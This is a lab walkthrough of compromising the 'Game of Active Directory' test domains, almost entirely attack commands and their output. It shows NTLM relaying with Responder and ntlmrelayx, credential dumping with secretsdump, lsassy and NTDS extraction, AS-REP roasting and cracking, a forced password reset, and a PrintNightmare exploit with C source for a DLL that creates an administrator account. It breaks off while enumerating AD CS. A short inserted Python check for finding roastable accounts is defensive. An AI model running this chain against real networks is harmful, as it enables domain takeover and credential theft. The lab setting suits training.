┌──(kali㉿kali)-[~/goad] └─$ impacket-ntlmrelayx -tf relay.txt -of netntlm -smb2support -socks Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client DCSYNC loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client MSSQL loaded.. [*] Running in relay mode to hosts in targetfile [*] SOCKS proxy started. Listening on 127.0.0.1:1080 [*] SMB Socks Plugin loaded.. [*] HTTP Socks Plugin loaded.. [*] SMTP Socks Plugin loaded.. [*] IMAP Socks Plugin loaded.. [*] IMAPS Socks Plugin loaded.. [*] MSSQL Socks Plugin loaded.. [*] HTTPS Socks Plugin loaded.. [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver' * Debug mode: off [*] Setting up WCF Server [*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections Type help for list of commands ntlmrelayx>
Start Responder as well.
┌──(kali㉿kali)-[~]
└─$ sudo responder -I eth1
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [OFF]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [eth1]
Responder IP [192.168.56.104]
Responder IPv6 [fe80::5af0:79:dd52:80d1]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-E217ZFS7CUP]
Responder Domain Name [DCK5.LOCAL]
Responder DCE-RPC Port [47652]
[+] Listening for events...
After waiting a while on ntlmrelayx, the following output appears.
ntlmrelayx> [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication [*] SMBD-Thread-13 (process_request_thread): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, attacking target smb://192.168.56.23 [*] Authenticating against smb://192.168.56.23 as NORTH/EDDARD.STARK SUCCEED [*] SOCKS: Adding NORTH/EDDARD.STARK@192.168.56.23(445) to active SOCKS connection. Enjoy [*] SMBD-Thread-13 (process_request_thread): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, attacking target smb://192.168.56.22 [*] Authenticating against smb://192.168.56.22 as NORTH/EDDARD.STARK SUCCEED [*] SOCKS: Adding NORTH/EDDARD.STARK@192.168.56.22(445) to active SOCKS connection. Enjoy [*] SMBD-Thread-13 (process_request_thread): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, but there are no more targets left! [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication [*] SMBD-Thread-14 (process_request_thread): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, but there are no more targets left! [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication [*] SMBD-Thread-15 (process_request_thread): Connection from NORTH/ROBB.STARK@192.168.56.11 controlled, attacking target smb://192.168.56.23 [*] Authenticating against smb://192.168.56.23 as NORTH/ROBB.STARK SUCCEED [*] SOCKS: Adding NORTH/ROBB.STARK@192.168.56.23(445) to active SOCKS connection. 
Enjoy [*] SMBD-Thread-15 (process_request_thread): Connection from NORTH/ROBB.STARK@192.168.56.11 controlled, attacking target smb://192.168.56.22 [*] Authenticating against smb://192.168.56.22 as NORTH/ROBB.STARK SUCCEED [*] SOCKS: Adding NORTH/ROBB.STARK@192.168.56.22(445) to active SOCKS connection. Enjoy [*] SMBD-Thread-15 (process_request_thread): Connection from NORTH/ROBB.STARK@192.168.56.11 controlled, but there are no more targets left! [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication [*] SMBD-Thread-16 (process_request_thread): Connection from NORTH/ROBB.STARK@192.168.56.11 controlled, but there are no more targets left! [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
So we now have a SOCKS proxy available while running the man-in-the-middle attack.
Next, connect through proxychains and run secretsdump.
┌──(kali㉿kali)-[~/goad] └─$ proxychains impacket-secretsdump -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xe726c3449239522103313bbfa17ae832 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4363b6dc0c95588964884d7e1dfea1f7::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Dumping cached domain logon information (domain/username:hash) NORTH.SEVENKINGDOMS.LOCAL/sql_svc:$DCC2$10240#sql_svc#89e701ebbd305e4f5380c5150494584a: (2024-08-11 04:00:35) NORTH.SEVENKINGDOMS.LOCAL/robb.stark:$DCC2$10240#robb.stark#f19bfb9b10ba923f2e28b733e5dd1405: (2024-10-13 02:15:32) [*] Dumping LSA Secrets [*] $MACHINE.ACC NORTH\CASTELBLACK$:aes256-cts-hmac-sha1-96:7f588d89c8e329850eb2cfcb6f20dcc68346a58b33748b8ba3762f365bfd3857 NORTH\CASTELBLACK$:aes128-cts-hmac-sha1-96:7171432588c012604326db931b606ad9 NORTH\CASTELBLACK$:des-cbc-md5:08f707b33d52a2b6 NORTH\CASTELBLACK$:plain_password_hex:1111806e0bf8db391cb1c02c6411c34bce4b042253b862a6baa74e0a7654780999ff01c1d53d598ed08f168c35c a13303583a23343a965fa4b8f72afdfb63371b8f3d6aeb45d7e1e3c3f91d4f1ee a5977a41030a4e83603b6c4d78db03728bc79b041b02fc53943f14ce014ed7fa7 
c335c7e150467b8dba0023256d6f376150c45c7bde0635e2d1ed53848685f8ad dd100827f320d24d0ca9102a6ca7824ecc7994f0ed433c325a7e72d20960ce379 7570272218fbfb8868fba0037ace07459c34eb05cf05c00b9a78082676e45a128 3da88772cb7881a96312998f49b2b92a4575a46be4a2d839a0efd7d6f5d0b30f0 NORTH\CASTELBLACK$:aad3b435b51404eeaad3b435b51404ee:20425334e9f78d883485696487ab1b67::: [*] DPAPI_SYSTEM dpapi_machinekey:0x130872a1a24387df59aae05e7d4ca0c98dd5535d dpapi_userkey:0x86a53690af0fcd4490280ede099bc684e11a6918 [*] NL$KM 0000 22 34 01 76 01 70 30 93 88 A7 6B B2 87 43 59 69 "4.v.p0...k..CYi 0010 0E 41 BD 22 0A 0C CC 23 3A 5B B6 74 CB 90 D6 35 .A."...#:[.t...5 0020 14 CA D8 45 4A F0 DB 72 D5 CF 3B A1 ED 7F 3A 98 ...EJ..r..;...:. 0030 CD 4D D6 36 6A 35 24 2D A0 EB 0F 8E 3F 52 81 C9 .M.6j5$-....?R.. NL$KM:223401760170309388a76bb2874359690e41bd220a0ccc233a5bb674cb90d 63514cad8454af0db72d5cf3ba1ed7f3a98cd4dd6366a35242da0eb0f8e3f5281c9 [*] _SC_MSSQL$SQLEXPRESS north.sevenkingdoms.local\sql_svc:YouWillNotKerboroast1ngMeeeeee [*] Cleaning up... [*] Stopping service RemoteRegistry
Next, let’s use lsassy to get LSASS information. https://github.com/login-securite/lsassy
┌──(kali㉿kali)-[~/goad] └─$ proxychains lsassy --no-pass -d NORTH -u EDDARD.STARK 192.168.56.22 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK [+] 192.168.56.22 Authentication successful [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK [+] 192.168.56.22 Lsass dumped in C:\Windows\Temp\6HGg19bP.jpg (51439491 Bytes) [+] 192.168.56.22 Lsass dump deleted [+] 192.168.56.22 NORTH\robb.stark [NT] 831486ac7f26860c9e2f51ac91e1a07a | [SHA1] 3bea28f1c440eed7be7d423cefebb50322ed7b6c [+] 192.168.56.22 NORTH\CASTELBLACK$ [NT] 20425334e9f78d883485696487ab1b67 | [SHA1] 8f582df44ed1c9e9c9d26be730c0b99226271cf4 [+] 192.168.56.22 north.sevenkingdoms.local\CASTELBLACK$ [PWD] 1111806e0bf8db391cb1c02c6411c34bce4b042253b862a6baa74e0a7654780999ff01c1d53d598ed08f168c35ca13303583a23343a965fa4b8f72af dfb63371b8f3d6aeb45d7e1e3c3f91d4f1eea5977a41030a4e83603b6c4d78db03728bc79b041b02fc53943f14ce014ed7fa7c335c7e150467b8dba0 023256d6f376150c45c7bde0635e2d1ed53848685f8addd100827f320d24d0ca9102a6ca7824ecc7994f0ed433c325a7e72d20960ce3797570272218 fbfb8868fba0037ace07459c34eb05cf05c00b9a78082676e45a1283da88772cb7881a96312998f49b2b92a4575a46be4a2d839a0efd7d6f5d0b30f0 [+] 192.168.56.22 NORTH\sql_svc [NT] 84a5092f53390ea48d660be52b93b804 | [SHA1] 9fd961155e28b1c6f9b3859f32f4779ad6a06404 [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\robb.stark [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_robb.stark_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_d9e9f780.kirbi) [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\robb.stark [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_robb.stark_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_5fb85f38.kirbi) [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\sql_svc [TGT] Domain: 
NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_sql_svc_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_1ac82095.kirbi) [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$ [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_e55cd434.kirbi) [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$ [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_c9464f19.kirbi) [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$ [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_63039232.kirbi) [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$ [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_dd82f6bc.kirbi) [+] 192.168.56.22 18 Kerberos tickets written to /home/kali/.config/lsassy/tickets [+] 192.168.56.22 5 masterkeys saved to /home/kali/.config/lsassy/masterkeys.txt
We now have full Administrator privileges on Winterfell.
Meereen Walkthrough
Looking in BloodHound for users with AS-REP roasting enabled (Kerberos pre-authentication not required), I found ESSOS.LOCAL/MISSANDEI.
Let’s try running ASREPRoast.
┌──(kali㉿kali)-[~] └─$ nxc ldap 192.168.56.23 -u missandei -p '' --asreproast asreproast.hash SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) LDAP 192.168.56.23 445 BRAAVOS $krb5asrep$23$missandei@ESSOS.LOCAL:dcdfca025e409115dac3015ad2bdad49$8d5164d380201364641c6765135d0f1f396f15de39d107f3a23685f1b6aaacd52 c765146c336f31d9e33d59d614cfc1c05e0bc2bd414dcdee30acf84fef1d469d411 ecadb1ef16ba740692505fb983c5d335bd8d3c120f28f3476ef566a517629863f24 e68cd0d56ce56bd0b617b1bacaeb375d4b06a726809f6fef115cf8eecd0337611e4 259618593628c5058b5d86e9b994b555340086d4f72c57f9954dfd159e8e071d415 b2e8b9e85a3990e300b7253d3f0673c2e317f549dada4fc4b80c6f298f9bc296f1 fb077ddcf7aa31e9592b98bd7f11c572d0132b4fc8b38ce5543ba9415b28bc163e42
I’ll call john.
┌──(kali㉿kali)-[~/goad/braavos] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt asreproast.hash Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status fr3edom ($krb5asrep$23$missandei@ESSOS.LOCAL) 1g 0:00:00:01 DONE (2024-10-19 16:58) 0.8333g/s 1496Kp/s 1496Kc/s 1496KC/s franciene..found9tion Use the "--show" option to display all of the cracked passwords reliably Session completed.
I obtained the credentials missandei/fr3edom.
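Both brandon.stark and missandei turned up because their accounts carry the DONT_REQ_PREAUTH bit in userAccountControl. As an added example that is not part of the original post, this Python check decodes that attribute, lists enabled accounts that are AS-REP roastable, and builds the LDAP filter a defender can run against the DC to find them; the user entries are constructed (the old.svc account is made up).

```python
# userAccountControl bits (MS-SAMR values) relevant to this check.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQ_PREAUTH = 0x400000

# LDAP filter that asks the DC directly for pre-auth-exempt users:
# 1.2.840.113556.1.4.803 is the bitwise-AND matching rule, 4194304 is UF_DONT_REQ_PREAUTH.
PREAUTH_EXEMPT_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQ_PREAUTH}))"
)

# Constructed sample of what that query might return, mirroring the two accounts
# found in the walkthrough plus a disabled leftover (old.svc is made up).
SAMPLE_USERS = [
    {"sAMAccountName": "brandon.stark", "domain": "north.sevenkingdoms.local",
     "userAccountControl": 0x400200},   # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    {"sAMAccountName": "arya.stark", "domain": "north.sevenkingdoms.local",
     "userAccountControl": 0x200},      # NORMAL_ACCOUNT only
    {"sAMAccountName": "missandei", "domain": "essos.local",
     "userAccountControl": 0x400200},
    {"sAMAccountName": "old.svc", "domain": "essos.local",
     "userAccountControl": 0x400202},   # disabled but still exempt
]


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(users):
    """Enabled accounts that do not require Kerberos pre-authentication: anyone who can
    reach the KDC can request an AS-REP for them and crack it offline, as shown above."""
    return sorted(
        f"{u['domain']}/{u['sAMAccountName']}"
        for u in users
        if u["userAccountControl"] & UF_DONT_REQ_PREAUTH
        and not u["userAccountControl"] & UF_ACCOUNTDISABLE
    )


def stale_exemptions(users):
    """Disabled accounts still carrying the exemption; clear the flag before anyone
    re-enables them, otherwise they become roastable again silently."""
    both = UF_DONT_REQ_PREAUTH | UF_ACCOUNTDISABLE
    return sorted(u["sAMAccountName"] for u in users
                  if u["userAccountControl"] & both == both)


if __name__ == "__main__":
    print("LDAP filter:", PREAUTH_EXEMPT_FILTER)
    for u in SAMPLE_USERS:
        print(u["sAMAccountName"], decode_uac(u["userAccountControl"]))
    print("roastable now:", asrep_roastable(SAMPLE_USERS))
    print("stale exemptions:", stale_exemptions(SAMPLE_USERS))
```

Accounts that genuinely need the exemption (rare legacy clients) should at least have long random passwords, since the AS-REP is crackable at wordlist speed as the john runs above show.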
In BloodHound, missandei has GenericAll on the user khal.drogo.
So let’s change khal.drogo’s password.
The tool we will use is ldap_shell.
┌──(kali㉿kali)-[~/goad/braavos] └─$ ldap_shell essos.local/missandei -dc-host essos.local Password: [INFO] Starting interactive shell missandei# change_password khal.drogo horse [INFO] Got User DN: CN=khal.drogo,CN=Users,DC=essos,DC=local [INFO] Attempting to set new password of: horse [INFO] Password changed successfully!
Resetting the password gives us the credentials khal.drogo/horse.
Checking confirms that these credentials work.
┌──(kali㉿kali)-[~/goad/braavos] └─$ nxc smb braavos -u khal.drogo -p horse SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) SMB 192.168.56.23 445 BRAAVOS [+] essos.local\khal.drogo:horse (Pwn3d!)
WinRM authentication works as well.
┌──(kali㉿kali)-[~/goad/braavos] └─$ nxc winrm braavos -u khal.drogo -p horse WINRM 192.168.56.23 5985 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) WINRM 192.168.56.23 5985 BRAAVOS [+] essos.local\khal.drogo:horse (Pwn3d!)
For now, evil-winrm gives us a foothold.
┌──(kali㉿kali)-[~/goad/braavos] └─$ evil-winrm -u khal.drogo -p horse -i braavos Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\khal.drogo\Documents>
We will investigate whether PrintNightmare can be used to escalate privileges.
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Payload: create a local user and add it to the local Administrators group. */
int RunCMD()
{
    system("net users pnightmare Passw0rd123. /add");
    system("net localgroup administrators pnightmare /add");
    return 0;
}

/* Runs RunCMD() once, when the DLL is first loaded into the process. */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        RunCMD();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
This code creates a user called pnightmare and adds it to the local Administrators group when the DLL is loaded into a process.
Compile it:
x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c
Clone the PrintNightmare exploit code.
git clone https://github.com/cube0x0/CVE-2021-1675 printnightmare
Host the DLL on an SMB share (impacket’s smbserver.py); the share name must match the UNC path passed to the exploit.
smbserver.py -smb2support ATTACKSHARE .
Then run PrintNightmare.
┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare] └─$ python3 CVE-2021-1675.py essos.local/khal.drogo:horse@meereen.essos.local '\\192.168.56.104\ATTACKSHARE\nightmare.dll' [*] Connecting to ncacn_np:meereen.essos.local[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64\UNIDRV.DLL [*] Executing \??\UNC\192.168.56.104\ATTACKSHARE\nightmare.dll [*] Try 1... [*] Stage0: 0 [*] Try 2... [*] Stage0: 0 [*] Stage2: 0 [+] Exploit Completed
That gives us pnightmare/Passw0rd123.
Logging in with evil-winrm confirms it works.
┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare] └─$ evil-winrm -u pnightmare -p Passw0rd123. -i meereen Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\pnightmare\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ========================================== ========================================================================== SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeMachineAccountPrivilege Add workstations to domain Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeUndockPrivilege Remove computer from docking station Enabled SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after 
authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled *Evil-WinRM* PS C:\Users\pnightmare\Documents>
Now we can dump the NTLM hashes from NTDS.
┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare]
└─$ nxc smb meereen.essos.local -u pnightmare -p Passw0rd123. --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n]
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.12 445 MEEREEN [+] essos.local\pnightmare:Passw0rd123. (Pwn3d!)
SMB 192.168.56.12 445 MEEREEN [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 192.168.56.12 445 MEEREEN Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB 192.168.56.12 445 MEEREEN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.56.12 445 MEEREEN krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54798535f08dafb2f3ab805bb312961d:::
SMB 192.168.56.12 445 MEEREEN DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.56.12 445 MEEREEN vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB 192.168.56.12 445 MEEREEN daenerys.targaryen:1112:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
SMB 192.168.56.12 445 MEEREEN viserys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
SMB 192.168.56.12 445 MEEREEN khal.drogo:1114:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
SMB 192.168.56.12 445 MEEREEN jorah.mormont:1115:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
SMB 192.168.56.12 445 MEEREEN missandei:1116:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec:::
SMB 192.168.56.12 445 MEEREEN drogon:1117:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6:::
SMB 192.168.56.12 445 MEEREEN sql_svc:1118:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB 192.168.56.12 445 MEEREEN pnightmare:1121:aad3b435b51404eeaad3b435b51404ee:58cf12d7448ca3ea7da502c83ee6a31e:::
SMB 192.168.56.12 445 MEEREEN MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:f05997d79fa50e0346a4d593d8eb1741:::
SMB 192.168.56.12 445 MEEREEN BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:0d8d114e49ff85a35b3c97208d88dcf3:::
SMB 192.168.56.12 445 MEEREEN gmsaDragon$:1119:aad3b435b51404eeaad3b435b51404ee:563b455a419089dfbfa829cab9f2b174:::
SMB 192.168.56.12 445 MEEREEN removemiccomputer$:1120:aad3b435b51404eeaad3b435b51404ee:1e986d18a9b7c9543e2d57944e8656b7:::
SMB 192.168.56.12 445 MEEREEN SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:743ab45cdf64d2f368f501fd348ab3d8:::
SMB 192.168.56.12 445 MEEREEN [+] Dumped 18 NTDS hashes to /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds of which 13 were added to the database
SMB 192.168.56.12 445 MEEREEN [*] To extract only enabled accounts from the output file, run the following command:
SMB 192.168.56.12 445 MEEREEN [*] cat /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds | grep -iv disabled | cut -d ':' -f1
SMB 192.168.56.12 445 MEEREEN [*] grep -iv disabled /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds | cut -d ':' -f1
Braavos Strategy
Braavos, a member of the essos.local domain controlled by Meereen, hosts AD CS (Active Directory Certificate Services). I'd like to attack the AD CS side as well.
SpecterOps's whitepaper Certified Pre-Owned provides detailed information on AD CS attacks:
https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
Let's enumerate the AD CS configuration with certipy and look for vulnerable templates.
┌──(kali㉿kali)-[~/goad/braavos]
└─$ certipy-ad find -u 'khal.drogo' -p horse -dc-ip 192.168.56.12 -vulnerable -enabled
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 38 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 16 enabled certificate templates
[*] Trying to get CA configuration for 'ESSOS-CA' via CSRA
[*] Got CA configuration for 'ESSOS-CA'
[*] Saved BloodHound data to '20241023161533_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241023161533_Certipy.txt'
[*] Saved JSON output to '20241023161533_Certipy.json'

┌──(kali㉿kali)-[~/goad/braavos]
└─$ cat 20241023161533_Certipy.txt
Certificate Authorities
  0
    CA Name                             : ESSOS-CA
    DNS Name                            : braavos.essos.local
    Certificate Subject                 : CN=ESSOS-CA, DC=essos, DC=local
    Certificate Serial Number           : 5120F6B8733E26BC43F390382A65D06B
    Certificate Validity Start          : 2024-08-11 03:37:50+00:00
    Certificate Validity End            : 2029-08-11 03:47:49+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Enabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : ESSOS.LOCAL\Administrators
      Access Rights
        ManageCertificates              : ESSOS.LOCAL\Administrators
                                          ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        ManageCa                        : ESSOS.LOCAL\Administrators
                                          ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Enroll                          : ESSOS.LOCAL\Authenticated Users
    [!] Vulnerabilities
